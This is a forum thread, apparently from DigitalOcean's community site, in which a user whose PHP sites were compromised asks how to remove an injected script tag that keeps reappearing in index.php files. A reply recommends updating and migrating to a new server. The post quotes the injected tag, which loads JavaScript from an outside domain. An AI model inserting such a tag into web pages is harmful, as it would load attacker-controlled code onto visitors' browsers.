By Smit Patel
Guys, I am in a big trouble. My web server got hacked. I noticed this script tag
<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>
at top of almost every index.php file. When I try to remove it, it automatically rewrite the file after i save. Keeping that in mind and after seeing all website running on same server (only php sites), I came to a conclusion that this is not a simple php script attack, it just hacked my whole server.
Any idea what it might be? How I can remove that malware? Should I reinstall ubuntu?
This textbox defaults to using Markdown to format your answer.
You can type !ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!
Hi @netdevv,
It seems like there is an exploit to your website or one of your websites which keeps getting used to re-enter your files and put the malicious code there. If it’s the WordPress website, I’ll recommend upgrading your Plugins, Themes and the CMS as well to the most up to date version possbile.
If your PHP websites are the reason, you’ll need to go through them manually and update wherever your code has been deprecated.
As for the Droplet, if you believe it has been accessed by a third party, then I’ll recommend creating a new one, cleaning your websites and then migrating them over to the new droplet.
Regards, KDSys
Get paid to write technical tutorials and select a tech-focused charity to receive a matching donation.
Full documentation for every DigitalOcean product.
The Wave has everything you need to know about building a business, from raising funding to marketing your product.
Stay up to date by signing up for DigitalOcean’s Infrastructure as a Newsletter.
New accounts only. By submitting your email you agree to our Privacy Policy
Scale up as you grow — whether you're running one virtual machine or ten thousand.
Sign up and get $200 in credit for your first 60 days with DigitalOcean.*
*This promotional offer applies to new accounts only.